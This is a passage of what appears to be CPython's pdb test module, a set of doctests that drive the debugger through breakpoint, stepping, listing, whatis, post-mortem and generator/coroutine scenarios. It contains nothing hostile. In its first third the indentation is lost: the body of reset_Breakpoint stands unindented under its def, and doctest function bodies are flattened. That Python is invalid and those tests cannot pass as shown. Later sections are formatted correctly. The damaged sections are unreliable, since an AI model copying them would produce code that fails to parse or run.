    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
    -> return foo.upper()
    (Pdb) retval
    'BAZ'
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
    -> test_function3(kwonly=True)
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
    -> def test_function3(arg=None, *, kwonly=None):
    (Pdb) args
    arg = None
    kwonly = True
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
    -> pass
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
    -> test_function4(1, 2, 3)
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
    -> def test_function4(a, b, c, /):
    (Pdb) args
    a = 1
    b = 2
    c = 3
    (Pdb) continue
    BAZ
    """
    # NOTE: the docstring above is an executable doctest (step/args/list/
    # bt/jump/retval etc.); its expected output is matched by the doctest
    # runner, so do not edit it cosmetically.
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
    """Test basic commands related to breakpoints.
    >>> def test_function():
    ... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ... print(1)
    ... print(2)
    ... print(3)
    ... print(4)
    First, need to clear bdb state that might be left over from previous tests.
    Otherwise, the new breakpoints might get assigned different numbers.
    >>> reset_Breakpoint()
    Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
    the breakpoint list outputs a tab for the "stop only" and "ignore next"
    lines, which we don't want to put in here.
    >>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
    ... 'break 3',
    ... 'disable 1',
    ... 'ignore 1 10',
    ... 'condition 1 1 < 2',
    ... 'break 4',
    ... 'break 4',
    ... 'break',
    ... 'clear 3',
    ... 'break',
    ... 'condition 1',
    ... 'enable 1',
    ... 'clear 1',
    ... 'commands 2',
    ... 'p "42"',
    ... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
    ... 'end',
    ... 'continue', # will stop at breakpoint 2 (line 4)
    ... 'clear', # clear all!
    ... 'y',
    ... 'tbreak 5',
    ... 'continue', # will stop at temporary breakpoint
    ... 'break', # make sure breakpoint is gone
    ... 'commands 10', # out of range
    ... 'commands a', # display help
    ... 'commands 4', # already deleted
    ... 'continue',
    ... ]):
    ... test_function()
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
    -> print(1)
    (Pdb) break 3
    Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) disable 1
    Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) ignore 1 10
    Will ignore next 10 crossings of breakpoint 1.
    (Pdb) condition 1 1 < 2
    New condition set for breakpoint 1.
    (Pdb) break 4
    Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break 4
    Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break
    Num Type Disp Enb Where
    1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    stop only if 1 < 2
    ignore next 10 hits
    2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) clear 3
    Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) break
    Num Type Disp Enb Where
    1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    stop only if 1 < 2
    ignore next 10 hits
    2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) condition 1
    Breakpoint 1 is now unconditional.
    (Pdb) enable 1
    Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) clear 1
    Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
    (Pdb) commands 2
    (com) p "42"
    (com) print("42", 7*6)
    (com) end
    (Pdb) continue
    1
    '42'
    42 42
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
    -> print(2)
    (Pdb) clear
    Clear all breaks? y
    Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
    (Pdb) tbreak 5
    Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
    (Pdb) continue
    2
    Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
    > <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
    -> print(3)
    (Pdb) break
    (Pdb) commands 10
    *** cannot set commands: Breakpoint number 10 out of range
    (Pdb) commands a
    *** Usage: commands [bnum]
    ...
    end
    (Pdb) commands 4
    *** cannot set commands: Breakpoint 4 already deleted
    (Pdb) continue
    3
    4
    """
    # NOTE: the docstring above is an executable doctest covering the
    # break/disable/ignore/condition/clear/tbreak/commands machinery; its
    # expected output is matched by the doctest runner -- do not edit it
    # cosmetically.
def test_pdb_breakpoints_preserved_across_interactive_sessions():
    """Breakpoints are remembered between interactive sessions
    >>> reset_Breakpoint()
    >>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ... 'import test.test_pdb',
    ... 'break test.test_pdb.do_something',
    ... 'break test.test_pdb.do_nothing',
    ... 'break',
    ... 'continue',
    ... ]):
    ... pdb.run('print()')
    > <string>(1)<module>()...
    (Pdb) import test.test_pdb
    (Pdb) break test.test_pdb.do_something
    Breakpoint 1 at ...test_pdb.py:...
    (Pdb) break test.test_pdb.do_nothing
    Breakpoint 2 at ...test_pdb.py:...
    (Pdb) break
    Num Type Disp Enb Where
    1 breakpoint keep yes at ...test_pdb.py:...
    2 breakpoint keep yes at ...test_pdb.py:...
    (Pdb) continue
    >>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ... 'break',
    ... 'break pdb.find_function',
    ... 'break',
    ... 'clear 1',
    ... 'continue',
    ... ]):
    ... pdb.run('print()')
    > <string>(1)<module>()...
    (Pdb) break
    Num Type Disp Enb Where
    1 breakpoint keep yes at ...test_pdb.py:...
    2 breakpoint keep yes at ...test_pdb.py:...
    (Pdb) break pdb.find_function
    Breakpoint 3 at ...pdb.py:97
    (Pdb) break
    Num Type Disp Enb Where
    1 breakpoint keep yes at ...test_pdb.py:...
    2 breakpoint keep yes at ...test_pdb.py:...
    3 breakpoint keep yes at ...pdb.py:...
    (Pdb) clear 1
    Deleted breakpoint 1 at ...test_pdb.py:...
    (Pdb) continue
    >>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ... 'break',
    ... 'clear 2',
    ... 'clear 3',
    ... 'continue',
    ... ]):
    ... pdb.run('print()')
    > <string>(1)<module>()...
    (Pdb) break
    Num Type Disp Enb Where
    2 breakpoint keep yes at ...test_pdb.py:...
    3 breakpoint keep yes at ...pdb.py:...
    (Pdb) clear 2
    Deleted breakpoint 2 at ...test_pdb.py:...
    (Pdb) clear 3
    Deleted breakpoint 3 at ...pdb.py:...
    (Pdb) continue
    """
    # NOTE: the docstring above is an executable doctest spanning three
    # consecutive pdb sessions; its expected output is matched by the
    # doctest runner -- do not edit it cosmetically.
def test_pdb_pp_repr_exc():
    """Test that do_p/do_pp do not swallow exceptions.
    >>> class BadRepr:
    ... def __repr__(self):
    ... raise Exception('repr_exc')
    >>> obj = BadRepr()
    >>> def test_function():
    ... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    >>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
    ... 'p obj',
    ... 'pp obj',
    ... 'continue',
    ... ]):
    ... test_function()
    --Return--
    > <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
    -> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    (Pdb) p obj
    *** Exception: repr_exc
    (Pdb) pp obj
    *** Exception: repr_exc
    (Pdb) continue
    """
    # NOTE: the docstring above is an executable doctest; its expected
    # output is matched by the doctest runner -- do not edit it cosmetically.
def do_nothing():
    # Breakpoint target referenced by the doctests above (by qualified name).
    pass
def do_something():
    # Breakpoint target referenced by the doctests above; prints 42.
    print(42)
def test_list_commands():
    # Executable doctest: the transcript in the docstring IS the test
    # (NORMALIZE_WHITESPACE makes the list-output column spacing flexible).
    """Test the list and source commands of pdb.
    >>> def test_function_2(foo):
    ...     import test.test_pdb
    ...     test.test_pdb.do_nothing()
    ...     'some...'
    ...     'more...'
    ...     'code...'
    ...     'to...'
    ...     'make...'
    ...     'a...'
    ...     'long...'
    ...     'listing...'
    ...     'useful...'
    ...     '...'
    ...     '...'
    ...     return foo
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     ret = test_function_2('baz')
    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'list',      # list first function
    ...     'step',      # step into second function
    ...     'list',      # list second function
    ...     'list',      # continue listing to EOF
    ...     'list 1,3',  # list specific lines
    ...     'list x',    # invalid argument
    ...     'next',      # step to import
    ...     'next',      # step over import
    ...     'step',      # step into do_nothing
    ...     'longlist',  # list all lines
    ...     'source do_something',  # list all lines of function
    ...     'source fooxxx',        # something that doesn't exit
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) list
    1 def test_function():
    2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    3 -> ret = test_function_2('baz')
    [EOF]
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
    -> def test_function_2(foo):
    (Pdb) list
    1 -> def test_function_2(foo):
    2 import test.test_pdb
    3 test.test_pdb.do_nothing()
    4 'some...'
    5 'more...'
    6 'code...'
    7 'to...'
    8 'make...'
    9 'a...'
    10 'long...'
    11 'listing...'
    (Pdb) list
    12 'useful...'
    13 '...'
    14 '...'
    15 return foo
    [EOF]
    (Pdb) list 1,3
    1 -> def test_function_2(foo):
    2 import test.test_pdb
    3 test.test_pdb.do_nothing()
    (Pdb) list x
    *** ...
    (Pdb) next
    > <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
    -> import test.test_pdb
    (Pdb) next
    > <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
    -> test.test_pdb.do_nothing()
    (Pdb) step
    --Call--
    > ...test_pdb.py(...)do_nothing()
    -> def do_nothing():
    (Pdb) longlist
    ... -> def do_nothing():
    ...     pass
    (Pdb) source do_something
    ... def do_something():
    ...     print(42)
    (Pdb) source fooxxx
    *** ...
    (Pdb) continue
    """
def test_pdb_whatis_command():
    # Executable doctest: the transcript in the docstring IS the test.
    """Test the whatis command
    >>> myvar = (1,2)
    >>> def myfunc():
    ...     pass
    >>> class MyClass:
    ...     def mymethod(self):
    ...         pass
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'whatis myvar',
    ...     'whatis myfunc',
    ...     'whatis MyClass',
    ...     'whatis MyClass()',
    ...     'whatis MyClass.mymethod',
    ...     'whatis MyClass().mymethod',
    ...     'continue',
    ... ]):
    ...     test_function()
    --Return--
    > <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
    -> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    (Pdb) whatis myvar
    <class 'tuple'>
    (Pdb) whatis myfunc
    Function myfunc
    (Pdb) whatis MyClass
    Class test.test_pdb.MyClass
    (Pdb) whatis MyClass()
    <class 'test.test_pdb.MyClass'>
    (Pdb) whatis MyClass.mymethod
    Function mymethod
    (Pdb) whatis MyClass().mymethod
    Method mymethod
    (Pdb) continue
    """
def test_post_mortem():
    # Executable doctest: the transcript in the docstring IS the test.
    # The "(10)<module>()" frame reference depends on the exact line count
    # of the `with` example below.
    """Test post mortem traceback debugging.
    >>> def test_function_2():
    ...     try:
    ...         1/0
    ...     finally:
    ...         print('Exception!')
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     test_function_2()
    ...     print('Not reached.')
    >>> with PdbTestInput([  # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ...     'next',      # step over exception-raising call
    ...     'bt',        # get a backtrace
    ...     'list',      # list code of test_function()
    ...     'down',      # step into test_function_2()
    ...     'list',      # list code of test_function_2()
    ...     'continue',
    ... ]):
    ...     try:
    ...         test_function()
    ...     except ZeroDivisionError:
    ...         print('Correctly reraised.')
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
    (Pdb) next
    Exception!
    ZeroDivisionError: division by zero
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
    (Pdb) bt
    ...
    <doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
    -> test_function()
    > <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
    -> test_function_2()
    <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
    -> 1/0
    (Pdb) list
    1 def test_function():
    2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    3 -> test_function_2()
    4 print('Not reached.')
    [EOF]
    (Pdb) down
    > <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
    -> 1/0
    (Pdb) list
    1 def test_function_2():
    2 try:
    3 >> 1/0
    4 finally:
    5 -> print('Exception!')
    [EOF]
    (Pdb) continue
    Correctly reraised.
    """
def test_pdb_skip_modules():
    # Executable doctest: stepping must NOT enter string.capwords because
    # the 'stri*' pattern in skip= matches the string module.
    """This illustrates the simple case of module skipping.
    >>> def skip_module():
    ...     import string
    ...     import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
    ...     string.capwords('FOO')
    >>> with PdbTestInput([
    ...     'step',
    ...     'continue',
    ... ]):
    ...     skip_module()
    > <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
    -> string.capwords('FOO')
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
    -> string.capwords('FOO')
    (Pdb) continue
    """
# Module for testing skipping of module that makes a callback
# (its name matches the 'module_to_skip*' skip pattern used by the doctest
# below; foo_pony just invokes the callback it is given).
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
    # Executable doctest: frames inside the skipped module are invisible,
    # but the callback (defined here) is still stepped into.
    """This illustrates skipping of modules that call into other code.
    >>> def skip_module():
    ...     def callback():
    ...         return None
    ...     import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
    ...     mod.foo_pony(callback)
    >>> with PdbTestInput([
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'step',
    ...     'continue',
    ... ]):
    ...     skip_module()
    ...     pass  # provides something to "step" to
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
    -> mod.foo_pony(callback)
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
    -> def callback():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
    -> return None
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
    -> return None
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
    -> mod.foo_pony(callback)
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
    -> pass  # provides something to "step" to
    (Pdb) continue
    """
def test_pdb_continue_in_bottomframe():
    # Executable doctest: 'break 7' targets line 7 of test_function below,
    # so the function's line layout must not change.
    """Test that "continue" and "next" work properly in bottom frame (issue #5294).
    >>> def test_function():
    ...     import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
    ...     inst.set_trace()
    ...     inst.botframe = sys._getframe()  # hackery to get the right botframe
    ...     print(1)
    ...     print(2)
    ...     print(3)
    ...     print(4)
    >>> with PdbTestInput([  # doctest: +ELLIPSIS
    ...     'next',
    ...     'break 7',
    ...     'continue',
    ...     'next',
    ...     'continue',
    ...     'continue',
    ... ]):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
    -> inst.botframe = sys._getframe()  # hackery to get the right botframe
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
    -> print(1)
    (Pdb) break 7
    Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
    (Pdb) continue
    1
    2
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
    -> print(3)
    (Pdb) next
    3
    > <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
    -> print(4)
    (Pdb) continue
    4
    """
def pdb_invoke(method, arg):
    """Look up *method* on a fresh non-interactive Pdb and call it with *arg*."""
    debugger = pdb.Pdb(nosigint=True, readrc=False)
    bound_method = getattr(debugger, method)
    bound_method(arg)
def test_pdb_run_with_incorrect_argument():
    # Executable doctest: the expected TypeError tracebacks are the test.
    """Testing run and runeval with incorrect first argument.
    >>> pti = PdbTestInput(['continue',])
    >>> with pti:
    ...     pdb_invoke('run', lambda x: x)
    Traceback (most recent call last):
    TypeError: exec() arg 1 must be a string, bytes or code object
    >>> with pti:
    ...     pdb_invoke('runeval', lambda x: x)
    Traceback (most recent call last):
    TypeError: eval() arg 1 must be a string, bytes or code object
    """
def test_pdb_run_with_code_object():
    # Executable doctest: run/runeval accept pre-compiled code objects.
    """Testing run and runeval with code object as a first argument.
    >>> with PdbTestInput(['step','x', 'continue']):  # doctest: +ELLIPSIS
    ...     pdb_invoke('run', compile('x=1', '<string>', 'exec'))
    > <string>(1)<module>()...
    (Pdb) step
    --Return--
    > <string>(1)<module>()->None
    (Pdb) x
    1
    (Pdb) continue
    >>> with PdbTestInput(['x', 'continue']):
    ...     x=0
    ...     pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
    > <string>(1)<module>()->None
    (Pdb) x
    1
    (Pdb) continue
    """
def test_next_until_return_at_return_event():
    # Executable doctest: the transcript in the docstring IS the test.
    """Test that pdb stops after a next/until/return issued at a return debug event.
    >>> def test_function_2():
    ...     x = 1
    ...     x = 2
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     test_function_2()
    ...     test_function_2()
    ...     test_function_2()
    ...     end = 1
    >>> reset_Breakpoint()
    >>> with PdbTestInput(['break test_function_2',
    ...                    'continue',
    ...                    'return',
    ...                    'next',
    ...                    'continue',
    ...                    'return',
    ...                    'until',
    ...                    'continue',
    ...                    'return',
    ...                    'return',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
    -> test_function_2()
    (Pdb) break test_function_2
    Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) next
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
    -> test_function_2()
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) until
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
    -> test_function_2()
    (Pdb) continue
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
    -> x = 1
    (Pdb) return
    --Return--
    > <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
    -> x = 2
    (Pdb) return
    > <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
    -> end = 1
    (Pdb) continue
    """
def test_pdb_next_command_for_generator():
    # Executable doctest: the transcript in the docstring IS the test.
    """Testing skip unwindng stack on yield for generators for "next" command
    >>> def test_gen():
    ...     yield 0
    ...     return 1
    ...     yield 2
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     it = test_gen()
    ...     try:
    ...         if next(it) != 0:
    ...             raise AssertionError
    ...         next(it)
    ...     except StopIteration as ex:
    ...         if ex.value != 1:
    ...             raise AssertionError
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
    -> it = test_gen()
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
    -> try:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
    -> if next(it) != 0:
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
    -> yield 0
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
    -> return 1
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
    -> return 1
    (Pdb) step
    StopIteration: 1
    > <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
    -> next(it)
    (Pdb) continue
    finished
    """
def test_pdb_next_command_for_coroutine():
    # Executable doctest: the transcript in the docstring IS the test.
    """Testing skip unwindng stack on yield for coroutines for "next" command
    >>> import asyncio
    >>> async def test_coro():
    ...     await asyncio.sleep(0)
    ...     await asyncio.sleep(0)
    ...     await asyncio.sleep(0)
    >>> async def test_main():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     await test_coro()
    >>> def test_function():
    ...     loop = asyncio.new_event_loop()
    ...     loop.run_until_complete(test_main())
    ...     loop.close()
    ...     asyncio.set_event_loop_policy(None)
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'next',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
    -> await test_coro()
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
    -> async def test_coro():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
    -> await asyncio.sleep(0)
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
    -> await asyncio.sleep(0)
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
    -> await asyncio.sleep(0)
    (Pdb) next
    Internal StopIteration
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
    -> await test_coro()
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
    -> await test_coro()
    (Pdb) continue
    finished
    """
def test_pdb_next_command_for_asyncgen():
    # Executable doctest: the transcript in the docstring IS the test.
    """Testing skip unwindng stack on yield for coroutines for "next" command
    >>> import asyncio
    >>> async def agen():
    ...     yield 1
    ...     await asyncio.sleep(0)
    ...     yield 2
    >>> async def test_coro():
    ...     async for x in agen():
    ...         print(x)
    >>> async def test_main():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     await test_coro()
    >>> def test_function():
    ...     loop = asyncio.new_event_loop()
    ...     loop.run_until_complete(test_main())
    ...     loop.close()
    ...     asyncio.set_event_loop_policy(None)
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'next',
    ...                    'next',
    ...                    'step',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
    -> await test_coro()
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
    -> async def test_coro():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
    -> async for x in agen():
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
    -> print(x)
    (Pdb) next
    1
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
    -> async for x in agen():
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
    -> yield 1
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
    -> await asyncio.sleep(0)
    (Pdb) continue
    2
    finished
    """
def test_pdb_return_command_for_generator():
    # Executable doctest: the transcript in the docstring IS the test.
    """Testing no unwindng stack on yield for generators
    for "return" command
    >>> def test_gen():
    ...     yield 0
    ...     return 1
    ...     yield 2
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     it = test_gen()
    ...     try:
    ...         if next(it) != 0:
    ...             raise AssertionError
    ...         next(it)
    ...     except StopIteration as ex:
    ...         if ex.value != 1:
    ...             raise AssertionError
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'step',
    ...                    'return',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
    -> it = test_gen()
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
    -> try:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
    -> if next(it) != 0:
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) return
    StopIteration: 1
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
    -> next(it)
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
    -> except StopIteration as ex:
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
    -> if ex.value != 1:
    (Pdb) continue
    finished
    """
def test_pdb_return_command_for_coroutine():
    # Executable doctest: the transcript in the docstring IS the test.
    """Testing no unwindng stack on yield for coroutines for "return" command
    >>> import asyncio
    >>> async def test_coro():
    ...     await asyncio.sleep(0)
    ...     await asyncio.sleep(0)
    ...     await asyncio.sleep(0)
    >>> async def test_main():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     await test_coro()
    >>> def test_function():
    ...     loop = asyncio.new_event_loop()
    ...     loop.run_until_complete(test_main())
    ...     loop.close()
    ...     asyncio.set_event_loop_policy(None)
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'step',
    ...                    'next',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
    -> await test_coro()
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
    -> async def test_coro():
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
    -> await asyncio.sleep(0)
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
    -> await asyncio.sleep(0)
    (Pdb) continue
    finished
    """
def test_pdb_until_command_for_generator():
    # Executable doctest: 'until 4' targets line 4 of test_gen below.
    """Testing no unwindng stack on yield for generators
    for "until" command if target breakpoint is not reached
    >>> def test_gen():
    ...     yield 0
    ...     yield 1
    ...     yield 2
    >>> def test_function():
    ...     import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ...     for i in test_gen():
    ...         print(i)
    ...     print("finished")
    >>> with PdbTestInput(['step',
    ...                    'until 4',
    ...                    'step',
    ...                    'step',
    ...                    'continue']):
    ...     test_function()
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
    -> for i in test_gen():
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
    -> def test_gen():
    (Pdb) until 4
    0
    1
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
    -> yield 2
    (Pdb) step
    --Return--
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
    -> yield 2
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
    -> print(i)
    (Pdb) continue
    2
    finished
    """
